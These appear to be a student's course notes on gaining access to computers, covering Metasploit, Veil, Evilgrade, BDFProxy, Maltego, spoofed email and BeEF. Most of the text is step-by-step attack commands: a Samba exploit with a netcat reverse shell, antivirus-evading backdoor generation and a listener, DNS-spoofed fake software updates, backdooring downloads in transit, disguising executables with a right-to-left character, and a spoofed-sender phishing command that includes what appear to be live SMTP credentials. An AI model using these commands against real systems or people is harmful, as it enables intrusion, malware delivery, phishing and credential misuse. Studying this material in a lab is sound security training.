Gaining Access

Introduction

Everything is a Computer

Two main approaches

Server Side

  • Do not require user interaction, all we need is a target IP

  • Start with information gathering, find open ports, OS, installed services, and work from there

Client Side

  • Require user interaction, such as opening a file, a link

  • Information gathering is key here, create a trojan and use social engineering to get the target to run it.

Server-Side Attacks

  • Need an IP Address

  • Very simple if target is on the same network (netdiscover or zenmap)

  • If target has a domain, then a simple ping will return its IP

  • Getting the IP is trickier if the target is a personal computer, might be useless if the target is accessing the internet through a network as the IP will be the router and not the targets, client side attacks are more effective in this case asa reverse connection can be used.

Basic Information Gathering & Exploitation

  • Try default password

  • Services might be mis-configured, such as the “r” service. Ports 512, 513, 514

  • Some might even contain a back door!

  • Code execution vulnerabilities

Analysing Trojans

  • Check properties of the file

  • Is it what it seems to be

  • Run the file in a virtual machine and check resources

  • Use an online sandbox service (https://www.hybrid-analysis.com)

Using the Above Attacks Outside the Network

  • All of the server-side and client-side attacks work outside the network.

  • You just need to configure the connection properly.

This can be done using:

  • Port forwarding through the router

  • Installing Kali / tools on the cloud

  • Port forwarding using SSH

  • Tunneling services

Metasploit

Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks.

You can Google the open ports exploits and copy the exploit name from rapid7.com to get the exploit name.

  • msfconsole - runs the metasploit console

  • help - shows help

  • show [something] - something can be exploits, payloads, auxiliaries or options.

  • use [something] - use a certain exploit, payload or auxiliary.

  • set [option] [value] - configure [option] to have value of [value]

  • exploit - runs the current task

Example:

msfconsole
use exploit/multi/samba/usermap_script
show options
set RHOST 10.20.14.204
show options
show payloads
set PAYLOAD cmd/unix/reverse_netcat
show options
set LHOST 10.20.14.203
exploit

Nexpose

Vulnerability Management Framework

  • Discover open ports and running services

  • Find vulnerabilities

  • Find exploits

  • Verify them

  • Generate reports

  • Automate scans

Conclusion

The general steps are always the same!

  1. Discover open ports and running services

  2. Find vulnerabilities

  3. Find exploits

  4. Exploit / verify

  5. Report

Client-Side Attacks

  • Use if server side attacks fail

  • If IP is probably useless

  • Requires user interaction

  • Social engineering can be very useful

  • Information gathering is vital

Veil - Framework

  • A backdoor is a file that gives us full control over the macine that it gets executed on

  • Backdoors can be caught by Anti-Virus programs

  • Veil is a framework for generating undetectable backdoors

Veil Overview & Generating Backdoor

use 1
list
use 15
set LHOST 10.20.14.213
set LPORT 8080
options
set PROCESSORS 1
set SLEEP 6
generate
rev_https_8080
  • Google nodistribute

  • Upload the file

  • See the program being undetected from antivirus programs

Listening for Incoming Connections

msfconsole
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.20.14.213
set LPORT 8080
show options
exploit

Delivery Method

  • Put your backdoor file in /var/www/html in Kali

  • service apache2 start

  • Browse, download and start the exe file on Windows

  • Simple method which wont work see below

Windows 10 Fake Updates

  • Fake an update for an already installed program

  • Install backdoor instead of the update

  • Requires DNS spoofing + Evilgrade (a server to serve the update)

  1. Download and install Evilgrade

    • Download Evilgrade.zip

    • Go to the downloads and boule click evilgrade.zip to uncompress it.

    • Open a terminal and run the following commands:

cd /root/Downloads/evilgrade/
cpan Data::Dump
cpan Digest::MD5
cpan Time::HiRes
cpan RPC::XML
cp -r isrcore /etc/perl

Now the tool will work, it might display an error about Gnu.pm this is a known bug with evil-grade, if its annoying you the you can get rid of it using the by removing that lib using the following command

apt-get remove libterm-readline-gnu-perl

Just make sure you re-install it after you’re done in case it is needed by other tools

apt-get install libterm-readline-gnu-perl

  1. Start Evilgrade (./configure)

  2. Check programs that can be hijacked (show modules)

  3. Select one (configure [module])

  4. Set backdoor location (set agent [agent location])

  5. Start Server (start)

  6. Start dns spoofing and handler

# Once in evilgrade:
cd /opt/evilgrade
./evilgrade
show options
configure dap
show options
set agent /var/www/html/backdoor.exe
set endsite www.speedbit.com
show options
start

# Become MITM
bettercap -iface eth0 -caplet /root/spoof.cap
set dns.spoof.all true
set.spoof.domains update.speedbit.com
dns.spoof on

# Listen for connections
# Then wait for the user to look for updates

Backdoor Windows 10 Downloads on the Fly

  • Backdoor any exe the target downloads

  • We need to be MITM

  1. Set IP Address in config (leafpad /etc/bdfproxy/bdfproxy.cfg)

proxyMode = transparent
# Windows
HOST = 10.0.2.15
  1. Start bdfproxy (bdfproxy)

cd /opt/BDFProxy
./bdf_proxy.py
  1. Redirect traffic to bdfproxy (iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080)

  2. Start listening for connections (msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc)

  3. Start arp spoofing

Protecting Yourself Against Smart Delivery Methods

  • Ensure you’re not being MITMed - use trusted networks, xarp

  • Only download from HTTPS pages

  • Check file MD5 after download - http://www.winmd5.com

Social Engineering

  • Gather info about the users

  • Build a strategy based on the info

  • Build a backdoor based on the info

Maltego

Maltego is an information gathering tool that can be used to collect information about anything.

  • Target can be a website, company, person, etc.

  • Discover entities associated with target

  • Display info on a graph

  • Come up with an attack strategy

Backdooring any File

  • Combine backdoor with any file - generic solution

  • Users are more likely to run a pdf, image, or audio file than an executable

  • Works well with social engineering

  • How?

    • Use a download and execute payload that would:

      • Download a normal file (image, pdf, etc) and display it to the user

      • Download the evil file and execute it in the background

  • Use autoit to compile the backdoor file

  • Use right to left character (search for character in Kali) and replace .exe with gpj.exe and paste the special character after the name of the file

Fake Emails

  • Send fake emails

  • Looks like its sent from any address

  • Pretend to be a friend, company, boss, etc.

  • Friend - Ask them to open a file (image, pdf, etc.)

  • Support member - ask to login to control panel using fake login page

  • Support member - ask to run a command on a server

  • Ask to visit a normal web page

  • etc.

sendemail -xu jhnwck70@gmail.com -xp CBPr90hgSDUHL2vF -s smtp-relay.sendinblue.com:587 -f "user@company.com" -t "target@company.com" -u "Check out this car" -m "Hey, checkout this car https://url.com/link-to-file-download.jpg" -o message-header="From: Name Surname <name.surname@company.com>"
  • Use attached sendmail.php

Beef Framework

Browser Exploitation Framework allowing us to launch a number of attacks on a hooked target. Targets are hooked once they load a hook url

  • DNS spoof requests to a page containing the hook

  • Inject the hook in brosed pages (need to be MITM)

  • Use XSS exploit

  • Social engineer the target to open a hook page

Get the user to browse to your beef page